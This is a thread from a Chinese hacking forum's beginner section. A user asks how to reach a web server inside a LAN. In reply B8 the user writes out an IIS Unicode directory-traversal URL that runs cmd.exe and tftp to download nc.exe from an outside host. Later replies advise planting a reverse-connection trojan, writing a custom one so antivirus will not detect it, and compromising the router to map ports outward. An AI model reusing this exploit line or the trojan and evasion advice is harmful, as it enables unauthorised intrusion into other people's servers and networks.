论坛: 菜鸟乐园 标题: 如何得知所开端口? 复制本贴地址    
作者: rayr [rayr]    论坛用户   登录
在局域网内的一台电脑开通80端口的WEB服务,如何得知此端口在局域网上服务器所对应的端口?

地主 发表时间: 04/15 12:59

回复: suha [suha]   论坛用户   登录
用扫描器

B1层 发表时间: 04/15 13:16

回复: rayr [rayr]   论坛用户   登录
服务器每次重启连接的端口都会变啊!
如果端口开到几万,那不是每次都要看几十分钟的刷屏?

B2层 发表时间: 04/15 14:41

回复: sss [yangze]   版主   登录
问问管理员就知道了.

B3层 发表时间: 04/15 14:50

回复: group [group]   论坛用户   登录
看不太懂,是不是局域网内的端口是80,然后到防火墙上对外映射了一个端口,这样子就只有加个反向连接木马了

B4层 发表时间: 04/15 22:45

回复: rayr [rayr]   论坛用户   登录
就是这样的!
用netstat -a -n查看,发现80端口处于监听状态,但后面的Foreign Address都是0.0.0.0:0,没有任何连接。
而主机上也没有任何连接和开端口迹象。
QQ的4000也是处于这样的状态下,为什么它就可以与外界连接?


[此贴被 陶然(rayr) 在 4月16日8时40分 编辑过]

B5层 发表时间: 4/16 8:25

回复: yangze [yangze]   版主   登录
换个扫描器试着再扫描一下.
不可能你的服务器不响应你的请求的

B6层 发表时间: 04/16 17:01

回复: group [group]   论坛用户   登录
只有用反向木马监听了,我帮你问过一些人,没什么办法

B7层 发表时间: 04/16 21:46

回复: rayr [rayr]   论坛用户   登录
谢谢大家的帮助先!

哦,就是用网络神偷一类的木马吗?但问题是根本就没有连接,怎么监听?
还有就是,我不是想去连接一个局域网内的机子,我的意思是如果我是在局域网内用U漏洞上传一个木马http://*.*.*.*/_vti_bin/..%255c../winnt/system32/cmd.exe?/c+tftp -i *.*.*.* GET nt.exe C:\nc.exe,在本机上打开69端口,怎么让服务端连接?

B8层 发表时间: 04/17 17:50

回复: tmxk [tmxk]   论坛用户   登录
    我估计你说的东西可能是在防火墙上或是路由器上作的nat, nat 可以映射到端口的,你要是能把路由器也搞定了,可以写条语句,让69端口开到外部可访问的一个实地址的特定端口上去。

    我劝你还是作个反弹端口的木马(可能得自己写,一般的木马查病毒软件都不放过。)或是干脆放弃得了。

B9层 发表时间: 04/17 20:31

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号